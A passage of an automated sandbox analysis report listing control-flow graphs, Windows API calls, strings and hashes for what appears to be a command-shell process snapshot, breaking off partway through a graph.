                                                                    control_flow_graph 1142 7ff719672978-7ff7196729b6 1143 7ff7196729b9-7ff7196729c1 1142->1143 1143->1143 1144 7ff7196729c3-7ff7196729c5 1143->1144 1145 7ff7196729cb-7ff7196729cf 1144->1145 1146 7ff71967e441 1144->1146 1147 7ff7196729d2-7ff7196729da 1145->1147 1148 7ff719672a1e-7ff719672a3e FindFirstFileW 1147->1148 1149 7ff7196729dc-7ff7196729e1 1147->1149 1151 7ff71967e435-7ff71967e439 1148->1151 1152 7ff719672a44-7ff719672a5c FindClose 1148->1152 1149->1148 1150 7ff7196729e3-7ff7196729eb 1149->1150 1150->1147 1153 7ff7196729ed-7ff719672a1c call 7ff719678f80 1150->1153 1151->1146 1154 7ff719672ae3-7ff719672ae5 1152->1154 1155 7ff719672a62-7ff719672a6e 1152->1155 1157 7ff719672aeb-7ff719672b10 _wcsnicmp 1154->1157 1158 7ff71967e3f7-7ff71967e3ff 1154->1158 1156 7ff719672a70-7ff719672a78 1155->1156 1156->1156 1160 7ff719672a7a-7ff719672a8d 1156->1160 1157->1155 1161 7ff719672b16-7ff71967e3f1 _wcsicmp 1157->1161 1160->1146 1163 7ff719672a93-7ff719672a97 1160->1163 1161->1155 1161->1158 1165 7ff719672a9d-7ff719672ade memmove call 7ff7196713e0 1163->1165 1166 7ff71967e404-7ff71967e407 1163->1166 1165->1150 1168 7ff71967e40b-7ff71967e413 1166->1168 1168->1168 1170 7ff71967e415-7ff71967e42b memmove 1168->1170 1170->1151
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                    • Instruction ID: a0b1dbf19862fc0dc0d6f366625d7abf18a69a1cb73ae0af8fb55636af4e74ae
                                                                    • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                    • Instruction Fuzzy Hash: F751FB21B08A8285EA34AF1599442BAE672FB54BB8FC45231DE6D076D4DF3CE44AC720

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 643 7ff719674d5c-7ff719674e4b InitializeCriticalSection call 7ff7196758e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff719670580 call 7ff719674a14 call 7ff719674ad0 call 7ff719675554 GetCommandLineW 654 7ff719674e4d-7ff719674e54 643->654 654->654 655 7ff719674e56-7ff719674e61 654->655 656 7ff719674e67-7ff719674e7b call 7ff719672e44 655->656 657 7ff7196751cf-7ff7196751e3 call 7ff719663278 call 7ff719674c1c 655->657 662 7ff7196751ba-7ff7196751ce call 7ff719663278 call 7ff719674c1c 656->662 663 7ff719674e81-7ff719674ec3 GetCommandLineW call 7ff7196713e0 call 7ff71966ca40 656->663 662->657 663->662 674 7ff719674ec9-7ff719674ee8 call 7ff71967417c call 7ff719672394 663->674 678 7ff719674eed-7ff719674ef5 674->678 678->678 679 7ff719674ef7-7ff719674f1f call 7ff71966aa54 678->679 682 7ff719674f95-7ff719674fee GetConsoleOutputCP GetCPInfo call 7ff7196751ec GetProcessHeap HeapAlloc 679->682 683 7ff719674f21-7ff719674f30 679->683 689 7ff719675012-7ff719675018 682->689 690 7ff719674ff0-7ff719675006 GetConsoleTitleW 682->690 683->682 684 7ff719674f32-7ff719674f39 683->684 684->682 686 7ff719674f3b-7ff719674f77 call 7ff719663278 GetWindowsDirectoryW 684->686 696 7ff719674f7d-7ff719674f90 call 7ff719673c24 686->696 697 7ff7196751b1-7ff7196751b9 call 7ff719674c1c 686->697 692 7ff71967507a-7ff71967507e 689->692 693 7ff71967501a-7ff719675024 call 7ff719673578 689->693 690->689 691 7ff719675008-7ff71967500f 690->691 691->689 698 7ff7196750eb-7ff719675161 GetModuleHandleW GetProcAddress * 3 692->698 699 7ff719675080-7ff7196750b3 call 7ff71968b89c call 7ff71966586c call 7ff719663240 call 7ff719673448 692->699 693->692 707 7ff719675026-7ff719675030 693->707 696->682 697->662 704 7ff719675163-7ff719675167 698->704 705 7ff71967516f 698->705 724 7ff7196750b5-7ff7196750d0 call 7ff719673448 * 2 699->724 725 7ff7196750d2-7ff7196750d7 call 7ff719663278 699->725 704->705 710 7ff719675169-7ff71967516d 704->710 706 7ff719675172-7ff7196751af free call 7ff719678f80 705->706 712 7ff719675075 call 7ff71968cff0 707->712 713 7ff719675032-7ff719675059 GetStdHandle GetConsoleScreenBufferInfo 707->713 710->705 710->706 712->692 717 7ff71967505b-7ff719675067 713->717 718 7ff719675069-7ff719675073 713->718 717->692 718->692 718->712 729 7ff7196750dc-7ff7196750e6 GlobalFree 724->729 725->729 729->698
                                                                    APIs
                                                                    • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719674D9A
                                                                      • Part of subcall function 00007FF7196758E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF71968C6DB), ref: 00007FF7196758EF
                                                                    • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719674DBB
                                                                    • _get_osfhandle.MSVCRT ref: 00007FF719674DCA
                                                                    • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719674DE0
                                                                    • _get_osfhandle.MSVCRT ref: 00007FF719674DEE
                                                                    • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719674E04
                                                                      • Part of subcall function 00007FF719670580: _get_osfhandle.MSVCRT ref: 00007FF719670589
                                                                      • Part of subcall function 00007FF719670580: SetConsoleMode.KERNELBASE ref: 00007FF71967059E
                                                                      • Part of subcall function 00007FF719670580: _get_osfhandle.MSVCRT ref: 00007FF7196705AF
                                                                      • Part of subcall function 00007FF719670580: GetConsoleMode.KERNELBASE ref: 00007FF7196705C5
                                                                      • Part of subcall function 00007FF719670580: _get_osfhandle.MSVCRT ref: 00007FF7196705EF
                                                                      • Part of subcall function 00007FF719670580: GetConsoleMode.KERNELBASE ref: 00007FF719670605
                                                                      • Part of subcall function 00007FF719670580: _get_osfhandle.MSVCRT ref: 00007FF719670632
                                                                      • Part of subcall function 00007FF719670580: SetConsoleMode.KERNELBASE ref: 00007FF719670647
                                                                      • Part of subcall function 00007FF719674A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7196749F1), ref: 00007FF719674A28
                                                                      • Part of subcall function 00007FF719674A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7196749F1), ref: 00007FF719674A66
                                                                      • Part of subcall function 00007FF719674A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7196749F1), ref: 00007FF719674A7D
                                                                      • Part of subcall function 00007FF719674A14: memmove.MSVCRT(?,?,00000000,00007FF7196749F1), ref: 00007FF719674A9A
                                                                      • Part of subcall function 00007FF719674A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7196749F1), ref: 00007FF719674AA2
                                                                      • Part of subcall function 00007FF719674AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF719668798), ref: 00007FF719674AD6
                                                                      • Part of subcall function 00007FF719674AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF719668798), ref: 00007FF719674AEF
                                                                      • Part of subcall function 00007FF719675554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF719674E35), ref: 00007FF7196755DA
                                                                      • Part of subcall function 00007FF719675554: RegQueryValueExW.KERNELBASE ref: 00007FF719675623
                                                                      • Part of subcall function 00007FF719675554: RegQueryValueExW.KERNELBASE ref: 00007FF719675667
                                                                      • Part of subcall function 00007FF719675554: RegQueryValueExW.KERNELBASE ref: 00007FF7196756BE
                                                                      • Part of subcall function 00007FF719675554: RegQueryValueExW.KERNELBASE ref: 00007FF719675702
                                                                    • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719674E35
                                                                    • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719674E81
                                                                    • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719674F69
                                                                    • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719674F95
                                                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719674FB0
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719674FC1
                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719674FD8
                                                                    • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719674FF8
                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719675037
                                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF71967504B
                                                                    • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7196750DF
                                                                    • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7196750F2
                                                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF71967510F
                                                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719675130
                                                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF71967514A
                                                                    • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF719675175
                                                                      • Part of subcall function 00007FF719673578: _get_osfhandle.MSVCRT ref: 00007FF719673584
                                                                      • Part of subcall function 00007FF719673578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF71967359C
                                                                      • Part of subcall function 00007FF719673578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7196735C3
                                                                      • Part of subcall function 00007FF719673578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7196735D9
                                                                      • Part of subcall function 00007FF719673578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7196735ED
                                                                      • Part of subcall function 00007FF719673578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF719673602
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                    • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                    • API String ID: 1049357271-3021193919
                                                                    • Opcode ID: 09109df7b1f92dd6c706f13a256821a2299fbe80603d920afefa709af37ce98d
                                                                    • Instruction ID: 9dadb18147e0b99e8d1b9b08be2253f7024672ccf76fc94e22870046798407c8
                                                                    • Opcode Fuzzy Hash: 09109df7b1f92dd6c706f13a256821a2299fbe80603d920afefa709af37ce98d
                                                                    • Instruction Fuzzy Hash: 9AC14F21A08E428AEA04BF11A814179E6B2FF89BB9F859175D90E07795DF3CE54F8230

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 732 7ff719673c24-7ff719673c61 733 7ff71967ec5a-7ff71967ec5f 732->733 734 7ff719673c67-7ff719673c99 call 7ff71966af14 call 7ff71966ca40 732->734 733->734 736 7ff71967ec65-7ff71967ec6a 733->736 743 7ff71967ec97-7ff71967eca1 call 7ff71967855c 734->743 744 7ff719673c9f-7ff719673cb2 call 7ff71966b900 734->744 738 7ff71967412e-7ff71967415b call 7ff719678f80 736->738 744->743 749 7ff719673cb8-7ff719673cbc 744->749 750 7ff719673cbf-7ff719673cc7 749->750 750->750 751 7ff719673cc9-7ff719673ccd 750->751 752 7ff719673cd2-7ff719673cd8 751->752 753 7ff719673cda-7ff719673cdf 752->753 754 7ff719673ce5-7ff719673d62 GetCurrentDirectoryW towupper iswalpha 752->754 753->754 755 7ff719673faa-7ff719673fb3 753->755 756 7ff719673fb8 754->756 757 7ff719673d68-7ff719673d6c 754->757 755->752 759 7ff719673fc6-7ff719673fec GetLastError call 7ff71967855c call 7ff71967a5d6 756->759 757->756 758 7ff719673d72-7ff719673dcd towupper GetFullPathNameW 757->758 758->759 760 7ff719673dd3-7ff719673ddd 758->760 763 7ff719673ff1-7ff719674007 call 7ff71967855c _local_unwind 759->763 762 7ff719673de3-7ff719673dfb 760->762 760->763 765 7ff7196740fe-7ff719674119 call 7ff71967855c _local_unwind 762->765 766 7ff719673e01-7ff719673e11 762->766 773 7ff71967400c-7ff719674022 GetLastError 763->773 775 7ff71967411a-7ff71967412c call 7ff71966ff70 call 7ff71967855c 765->775 766->765 769 7ff719673e17-7ff719673e28 766->769 772 7ff719673e2c-7ff719673e34 769->772 772->772 776 7ff719673e36-7ff719673e3f 772->776 777 7ff719674028-7ff71967402b 773->777 778 7ff719673e95-7ff719673e9c 773->778 775->738 780 7ff719673e42-7ff719673e55 776->780 777->778 781 7ff719674031-7ff719674047 call 7ff71967855c _local_unwind 777->781 782 7ff719673e9e-7ff719673ec2 call 7ff719672978 778->782 783 7ff719673ecf-7ff719673ed3 778->783 787 7ff719673e57-7ff719673e60 780->787 788 7ff719673e66-7ff719673e8f GetFileAttributesW 780->788 799 7ff71967404c-7ff719674062 call 7ff71967855c _local_unwind 781->799 791 7ff719673ec7-7ff719673ec9 782->791 785 7ff719673f08-7ff719673f0b 783->785 786 7ff719673ed5-7ff719673ef7 GetFileAttributesW 783->786 795 7ff719673f0d-7ff719673f11 785->795 796 7ff719673f1e-7ff719673f40 SetCurrentDirectoryW 785->796 793 7ff719673efd-7ff719673f02 786->793 794 7ff719674067-7ff719674098 GetLastError call 7ff71967855c _local_unwind 786->794 787->788 797 7ff719673f9d-7ff719673fa5 787->797 788->773 788->778 791->783 791->799 793->785 802 7ff71967409d-7ff7196740b3 call 7ff71967855c _local_unwind 793->802 794->802 803 7ff719673f46-7ff719673f69 call 7ff71967498c 795->803 804 7ff719673f13-7ff719673f1c 795->804 796->803 805 7ff7196740b8-7ff7196740de GetLastError call 7ff71967855c _local_unwind 796->805 797->780 799->794 802->805 815 7ff7196740e3-7ff7196740f9 call 7ff71967855c _local_unwind 803->815 816 7ff719673f6f-7ff719673f98 call 7ff71967417c 803->816 804->796 804->803 805->815 815->765 816->775
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                    • String ID: :
                                                                    • API String ID: 1809961153-336475711
                                                                    • Opcode ID: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                                    • Instruction ID: c6645ddb4478333c0b0f09991b9babb289b0031e3f1bd3fee8f1b118faa7a636
                                                                    • Opcode Fuzzy Hash: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                                    • Instruction Fuzzy Hash: E3D15E3260CF8581EA68AF15E4452B9F7B2FB857A8F844135DA4E436A4DF3CE54AC730

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 914 7ff719672394-7ff719672416 memset call 7ff71966ca40 917 7ff71967241c-7ff719672453 GetModuleFileNameW call 7ff71967081c 914->917 918 7ff71967e0d2-7ff71967e0da call 7ff719674c1c 914->918 923 7ff71967e0db-7ff71967e0ee call 7ff71967498c 917->923 924 7ff719672459-7ff719672468 call 7ff71967081c 917->924 918->923 930 7ff71967e0f4-7ff71967e107 call 7ff71967498c 923->930 929 7ff71967246e-7ff71967247d call 7ff71967081c 924->929 924->930 935 7ff719672516-7ff719672529 call 7ff71967498c 929->935 936 7ff719672483-7ff719672492 call 7ff71967081c 929->936 939 7ff71967e10d-7ff71967e123 930->939 935->936 936->939 947 7ff719672498-7ff7196724a7 call 7ff71967081c 936->947 940 7ff71967e125-7ff71967e139 wcschr 939->940 941 7ff71967e13f-7ff71967e17a _wcsupr 939->941 940->941 944 7ff71967e27c 940->944 945 7ff71967e17c-7ff71967e17f 941->945 946 7ff71967e181-7ff71967e199 wcsrchr 941->946 949 7ff71967e283-7ff71967e29b call 7ff71967498c 944->949 948 7ff71967e19c 945->948 946->948 956 7ff7196724ad-7ff7196724c5 call 7ff719673c24 947->956 957 7ff71967e2a1-7ff71967e2c3 _wcsicmp 947->957 951 7ff71967e1a0-7ff71967e1a7 948->951 949->957 951->951 954 7ff71967e1a9-7ff71967e1bb 951->954 958 7ff71967e264-7ff71967e277 call 7ff719671300 954->958 959 7ff71967e1c1-7ff71967e1e6 954->959 964 7ff7196724ca-7ff7196724db 956->964 958->944 962 7ff71967e21a 959->962 963 7ff71967e1e8-7ff71967e1f1 959->963 969 7ff71967e21d-7ff71967e21f 962->969 965 7ff71967e1f3-7ff71967e1f6 963->965 966 7ff71967e201-7ff71967e210 963->966 967 7ff7196724dd-7ff7196724e4 ??_V@YAXPEAX@Z 964->967 968 7ff7196724e9-7ff719672514 call 7ff719678f80 964->968 965->966 970 7ff71967e1f8-7ff71967e1ff 965->970 966->962 971 7ff71967e212-7ff71967e218 966->971 967->968 969->949 973 7ff71967e221-7ff71967e228 969->973 970->965 970->966 971->969 975 7ff71967e22a-7ff71967e231 973->975 976 7ff71967e254-7ff71967e262 973->976 977 7ff71967e234-7ff71967e237 975->977 976->944 977->976 978 7ff71967e239-7ff71967e242 977->978 978->976 979 7ff71967e244-7ff71967e252 978->979 979->976 979->977
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                    • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                    • API String ID: 2622545777-4197029667
                                                                    • Opcode ID: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
                                                                    • Instruction ID: 742b9a3553a842a969c540a4ebd66363952600f2ee0d9740e501f5f706aba56d
                                                                    • Opcode Fuzzy Hash: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
                                                                    • Instruction Fuzzy Hash: 2F913F61B09E4285EE29AF50D8541B8A3B2FF44BA8FC44175C95E476A5DF3CE50EC330

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleMode_get_osfhandle
                                                                    • String ID: CMD.EXE
                                                                    • API String ID: 1606018815-3025314500
                                                                    • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                    • Instruction ID: 538b2497e3db7c0e25cfc2fc89b1895c7bf32ed122eaa9eac413fc96a4fa4bf2
                                                                    • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                    • Instruction Fuzzy Hash: 2041CC35A09E02CBE6086F15E855578FBB2BB89B69FC99175C91E46360DF3CA40EC630

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 992 7ff71966c620-7ff71966c66f GetConsoleTitleW 993 7ff71966c675-7ff71966c687 call 7ff71966af14 992->993 994 7ff71967c5f2 992->994 999 7ff71966c68e-7ff71966c69d call 7ff71966ca40 993->999 1000 7ff71966c689 993->1000 996 7ff71967c5fc-7ff71967c60c GetLastError 994->996 998 7ff71967c5e3 call 7ff719663278 996->998 1004 7ff71967c5e8-7ff71967c5ed call 7ff71967855c 998->1004 999->1004 1006 7ff71966c6a3-7ff71966c6ac 999->1006 1000->999 1004->994 1007 7ff71966c954-7ff71966c95e call 7ff71967291c 1006->1007 1008 7ff71966c6b2-7ff71966c6c5 call 7ff71966b9c0 1006->1008 1013 7ff71967c5de-7ff71967c5e0 1007->1013 1014 7ff71966c964-7ff71966c96b call 7ff7196689c0 1007->1014 1015 7ff71966c6cb-7ff71966c6ce 1008->1015 1016 7ff71966c9b5-7ff71966c9b8 call 7ff719675c6c 1008->1016 1013->998 1020 7ff71966c970-7ff71966c972 1014->1020 1015->1004 1018 7ff71966c6d4-7ff71966c6e9 1015->1018 1023 7ff71966c9bd-7ff71966c9c9 call 7ff71967855c 1016->1023 1021 7ff71967c616-7ff71967c620 call 7ff71967855c 1018->1021 1022 7ff71966c6ef-7ff71966c6fa 1018->1022 1020->996 1024 7ff71966c978-7ff71966c99a towupper 1020->1024 1025 7ff71967c627 1021->1025 1022->1025 1026 7ff71966c700-7ff71966c713 1022->1026 1039 7ff71966c9d0-7ff71966c9d7 1023->1039 1029 7ff71966c9a0-7ff71966c9a9 1024->1029 1031 7ff71967c631 1025->1031 1030 7ff71966c719-7ff71966c72c 1026->1030 1026->1031 1029->1029 1034 7ff71966c9ab-7ff71966c9af 1029->1034 1035 7ff71967c63b 1030->1035 1036 7ff71966c732-7ff71966c747 call 7ff71966d3f0 1030->1036 1031->1035 1034->1016 1037 7ff71967c60e-7ff71967c611 call 7ff71968ec14 1034->1037 1040 7ff71967c645 1035->1040 1045 7ff71966c74d-7ff71966c750 1036->1045 1046 7ff71966c8ac-7ff71966c8af 1036->1046 1037->1021 1043 7ff71966c9dd-7ff71967c6da SetConsoleTitleW 1039->1043 1044 7ff71966c872-7ff71966c8aa call 7ff71967855c call 7ff719678f80 1039->1044 1050 7ff71967c64e-7ff71967c651 1040->1050 1043->1044 1051 7ff71966c76a-7ff71966c76d 1045->1051 1052 7ff71966c752-7ff71966c764 call 7ff71966bd38 1045->1052 1046->1045 1049 7ff71966c8b5-7ff71966c8d3 wcsncmp 1046->1049 1049->1051 1056 7ff71966c8d9 1049->1056 1057 7ff71966c80d-7ff71966c811 1050->1057 1058 7ff71967c657-7ff71967c65b 1050->1058 1054 7ff71966c773-7ff71966c77a 1051->1054 1055 7ff71966c840-7ff71966c84b call 7ff71966cb40 1051->1055 1052->1004 1052->1051 1061 7ff71966c780-7ff71966c784 1054->1061 1076 